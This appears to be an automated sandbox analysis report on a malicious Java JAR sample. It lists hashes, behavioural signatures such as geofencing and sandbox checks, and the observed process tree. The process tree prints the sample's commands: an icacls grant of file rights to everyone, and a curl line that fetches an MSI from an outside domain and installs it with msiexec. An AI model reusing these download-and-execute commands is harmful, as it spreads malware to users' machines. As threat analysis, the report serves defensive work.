Analysis
-
max time kernel
128s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25-04-2024 01:46
Static task
static1
Behavioral task
behavioral1
Sample
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource
win10v2004-20240226-en
General
-
Target
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
-
Size
47KB
-
MD5
7f75fe01e92534899449d5191d586045
-
SHA1
a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
-
SHA256
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
-
SHA512
9b240cdb3d6a00821ef03c749807a3eaea5c1b065f7f88f94c5904a64f94d276a31efefb0a301549744f67a42e3dd8389a6a1d057ff1fd09a942b1b3dd5925bf
-
SSDEEP
768:s2quUO5gEeRU+aD+QusAXK9wEglRozyt8VomdfeBTcdgknm2+N9Utl:s2RvWayh9owEREmYBgnm2+y
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000064efbbd21686319b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000064efbbd20000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090064efbbd2000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d64efbbd2000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000064efbbd200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid process Token: SeShutdownPrivilege 816 msiexec.exe Token: SeIncreaseQuotaPrivilege 816 msiexec.exe Token: SeSecurityPrivilege 1068 msiexec.exe Token: SeCreateTokenPrivilege 816 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 816 msiexec.exe Token: SeLockMemoryPrivilege 816 msiexec.exe Token: SeIncreaseQuotaPrivilege 816 msiexec.exe Token: SeMachineAccountPrivilege 816 msiexec.exe Token: SeTcbPrivilege 816 msiexec.exe Token: SeSecurityPrivilege 816 msiexec.exe Token: SeTakeOwnershipPrivilege 816 msiexec.exe Token: SeLoadDriverPrivilege 816 msiexec.exe Token: SeSystemProfilePrivilege 816 msiexec.exe Token: SeSystemtimePrivilege 816 msiexec.exe Token: SeProfSingleProcessPrivilege 816 msiexec.exe Token: SeIncBasePriorityPrivilege 816 msiexec.exe Token: SeCreatePagefilePrivilege 816 msiexec.exe Token: SeCreatePermanentPrivilege 816 msiexec.exe Token: SeBackupPrivilege 816 msiexec.exe Token: SeRestorePrivilege 816 msiexec.exe Token: SeShutdownPrivilege 816 msiexec.exe Token: SeDebugPrivilege 816 msiexec.exe Token: SeAuditPrivilege 816 msiexec.exe Token: SeSystemEnvironmentPrivilege 816 msiexec.exe Token: SeChangeNotifyPrivilege 816 msiexec.exe Token: SeRemoteShutdownPrivilege 816 msiexec.exe Token: SeUndockPrivilege 816 msiexec.exe Token: SeSyncAgentPrivilege 816 msiexec.exe Token: SeEnableDelegationPrivilege 816 msiexec.exe Token: SeManageVolumePrivilege 816 msiexec.exe Token: SeImpersonatePrivilege 816 msiexec.exe Token: SeCreateGlobalPrivilege 816 msiexec.exe Token: SeBackupPrivilege 2836 vssvc.exe Token: SeRestorePrivilege 2836 vssvc.exe Token: SeAuditPrivilege 2836 vssvc.exe Token: SeBackupPrivilege 1068 msiexec.exe Token: SeRestorePrivilege 1068 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 816 msiexec.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
java.execmd.execmd.exedescription pid process target process PID 3732 wrote to memory of 4960 3732 java.exe icacls.exe PID 3732 wrote to memory of 4960 3732 java.exe icacls.exe PID 3732 wrote to memory of 1184 3732 java.exe cmd.exe PID 3732 wrote to memory of 1184 3732 java.exe cmd.exe PID 1184 wrote to memory of 4348 1184 cmd.exe curl.exe PID 1184 wrote to memory of 4348 1184 cmd.exe curl.exe PID 3732 wrote to memory of 3176 3732 java.exe cmd.exe PID 3732 wrote to memory of 3176 3732 java.exe cmd.exe PID 3176 wrote to memory of 816 3176 cmd.exe msiexec.exe PID 3176 wrote to memory of 816 3176 cmd.exe msiexec.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\cmd.execmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c C:\downloads\aHPCrYM1.msi2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1316 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\downloads\aHPCrYM1.msiFilesize
32KB
MD500a9fa63e6253cb5f8f8448281ddd054
SHA1083c7bf52727edffa8160308c677b4da8a4f7815
SHA256c76014007ba73efc85fd7b1d9e9bced4ea66da7c4cf4dd1560ec0cf02361fc5b
SHA512bed03aca4562187ab1aa818aa8c53474982c84f5f6e5b0331a2af4feb51d5bc7b1ac1d495040dcd2b572827d019fa3ff04d808011febc9fc52113b93587cb7a5
-
memory/3732-2-0x000001789D440000-0x000001789E440000-memory.dmpFilesize
16.0MB
-
memory/3732-11-0x000001789BA30000-0x000001789BA31000-memory.dmpFilesize
4KB
-
memory/3732-16-0x000001789BA30000-0x000001789BA31000-memory.dmpFilesize
4KB